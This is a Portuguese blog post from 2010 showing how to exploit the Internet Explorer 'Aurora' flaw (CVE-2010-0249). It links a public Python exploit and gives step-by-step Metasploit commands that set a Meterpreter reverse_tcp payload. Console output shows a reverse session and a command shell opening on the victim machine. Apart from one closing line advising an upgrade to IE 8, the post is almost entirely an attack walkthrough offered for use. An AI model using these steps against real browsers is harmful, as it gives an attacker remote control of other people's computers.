terça-feira, 19 de janeiro de 2010

Internet Explorer Aurora Exploit

Dia 17/01/2009 a galera da Offensive Security disponibilizou um exploit que explora a vulnerabilidade aurora (CVE-2010-0249) encontrada no Internet Explorer  6, 6 SP1, 7 em várias versões do windows.


O exploit disponibilizado é desenvolvido em phyton e executa a calculadora do windows no alvo.
O download pode ser feito em: http://www.exploit-db.com/exploits/11167.

para usa é fácil. É necessário ter o phyton defidamente instalado.

Windows/Linux:$ python ie_aurora.py 8080
[-] Web server is running at http://127.0.0.1:8080/



onde:
8080 - porta local

depois é só acessar pelo IE o endereço mostrado pelo script, no caso, http://127.0.0.1:8080/.
 O exploit será enviado e a calculadora executada no alvo.

Executar uma calculadora não é nada útil, mas, você pode modificar o script e colocar um payload metasploit para ser executado no lugar da calculadora, ou ainda, usar o próprio módulo do Metasploit, que facilita muito todo o trabalho. Irei mostrar agora como explorar essa vulnerabilidade pelo metasploit.

Primeiro execute o update do Metasploit(msfupdate), como Administrador ou root, para pegar os novos módulos. Depois rode o console do metasploit e faça:


msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >  

O payload usado abre uma conexão reversa no alvo. Em seguida abra o IE e acesse o endereço mostrado (http://192.168.0.151:8080/).

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...




meterpreter > shell

Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Pronto. Você já tem acesso shell disponível no alvo.

Obs: Aparentemente só funciona com o IE 6. Meus testes com windows XP SP3 e Internet Explorer 6 funcionaram perfeitamente, porém, no windows Vista e Internet Explorer 7 não obtive resultado.

################
Solução: Segundo nota emitida pela Microsoft a melhor forma de se pevenir do ataque é atualizando seu Internet Explorer para a versão 8.

Referências:
http://www.microsoft.com/technet/security/advisory/979352.mspx

 
Giorge Henrique Abdala

Nenhum comentário:

Postar um comentário